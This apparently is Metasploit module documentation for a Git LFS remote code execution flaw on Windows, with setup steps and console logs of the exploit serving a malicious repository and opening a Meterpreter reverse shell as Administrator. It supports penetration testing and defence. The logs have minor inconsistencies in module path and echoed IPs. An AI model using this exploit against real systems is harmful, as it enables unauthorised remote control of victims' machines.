## Vulnerable Application

Git in versions <= 2.29.2 includes git-lfs extension which allows remote attackers to execute arbitrary code on the 
victim's Windows system upon a clone operation. Attackers are able to plant a backdoor in the root directory of a 
malicious repository by simply adding an executable file named git.exe or any other executable extension available on 
the target Windows system (PATHEXT environment variable dependent). As a result, the malicious git binary will get 
executed automatically instead of the original git binary located in a trusted path, when the repository is cloned.

### Vulnerable Installation

1. Download a vulnerable version of Git for Windows: [v2.28.0](https://github.com/git-for-windows/git/releases/download/v2.28.0.windows.1/Git-2.28.0-64-bit.exe)
2. On the `Select Components` section of the installer, make sure Git LFS is selected (should be by default)
3. You should now be able to run the exploit and get a session on Windows

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/git_lfs_rce`
4. Do: `run`
5. Ensure the exploit sets up a repository to be cloned, ex: `http://192.168.123.1:8080/fixflex.git`
6. From the victim machine, clone the repository created by the exploit.
7. You should get a shell.

## Scenarios
### Git `v2.28.0` on Windows 10 (2004)
```
msf6 > use windows/http/git_lfs_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/git_lfs_rce) > set LHOST 172.16.199.1
LHOST => 172.16.199.1
msf6 exploit(windows/http/git_lfs_rce) > set RHOSTS 172.16.199.151
RHOSTS => 172.16.199.151
msf6 exploit(windows/http/git_lfs_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444 
msf6 exploit(windows/http/git_lfs_rce) > 
[*] Using URL: http://0.0.0.0:8080/4C11tyW2NVX
[*] Local IP: http://192.168.2.114:8080/4C11tyW2NVX
[*] Server started.
[*] Git repository to clone: http://172.16.199.1:8080/cookley.git
[*] Sending payload data...
[*] Sending LFS object...
[*] Sending stage (200262 bytes) to 172.16.199.151
[+] Deleted .gitattributes
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.151:50018) at 2021-09-07 12:05:55 -0400
msf6 exploit(windows/http/git_lfs_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-13BFU78\Administrator
meterpreter > sysinfo
Computer        : DESKTOP-13BFU78
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 
```

### Git `v2.32.0` on Windows 10 20H2
```
msf6 > use windows/http/git_lfs_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/git_lfs_rce) > set LHOST 192.168.123.1
LHOST => 192.168.123.1
msf6 exploit(windows/http/git_lfs_rce) > set RHOSTS 192.168.123.150
RHOSTS => 172.16.199.151
msf6 exploit(windows/http/git_lfs_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
msf6 exploit(windows/http/git_lfs_rce) > [*] Using URL: http://0.0.0.0:8080/15VCXHvHTOq5O
[*] Local IP: http://192.168.2.114:8080/15VCXHvHTOq5O
[*] Server started.
[*] Git repository to clone: http://192.168.123.1:8080/fixflex.git
[-] Exception handling request: The git client needs to be running on windows with a version less than 2.29.2. The client found was running on: Windows and was version: 2.32.0
```